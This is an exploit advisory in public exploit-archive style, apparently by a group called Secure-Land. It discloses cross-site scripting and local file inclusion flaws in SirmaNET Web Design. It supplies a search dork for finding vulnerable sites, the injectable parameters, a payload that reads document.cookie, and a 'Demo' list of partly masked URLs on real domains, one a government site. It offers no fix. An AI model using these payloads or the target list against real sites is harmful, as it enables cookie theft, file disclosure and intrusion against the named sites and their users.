######################################################################################## # # # Exploit Title : SirmaNET Web Design Multiple Vulnerabilities # # # # Author : Secure-Land Security Team # # # # Discovered By : farbodmahini # # # # Home : Secure-Land.net # # # # Vendor : www.sirmanet.com # # # # Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com # # # # Security Risk : High # # # # DorK : inurl:"index.php?sayfa=altmenu.php" # # # # # ######################################################################################## # # # [XSS]: # # # # http://[TarGeT]/index.php?sayfa=altmenu.php&ustmenu=[XSS] # # http://[TarGeT]/index.php?sayfa=altmenu.php&baslik1=[XSS] # # # # ~xss : # # # # ><script >alert(document.cookie)</script> # # # # [LFI] : # # # # http://[TarGeT]/index.php?sayfa=[LFI] # # # # # # Demo : # # # # http://basakxxir.meb.gov.tr/index.php?sayfa=altmenu.php&ustmenu=[XSS] # # http://www.yigitxxlakfinans.com/index.php?sayfa=altmenu.php&baslik1=[XSS] # # http://www.germxxica.com.tr/index.php?sayfa=altmenu.php&ustmenu=[XSS] # # www.yigitemlakfixxns.com/index.php?sayfa=[LFI] # # # ######################################################################################## # # # Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us # # # ######################################################################################## # # # Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id # # # ########################################################################################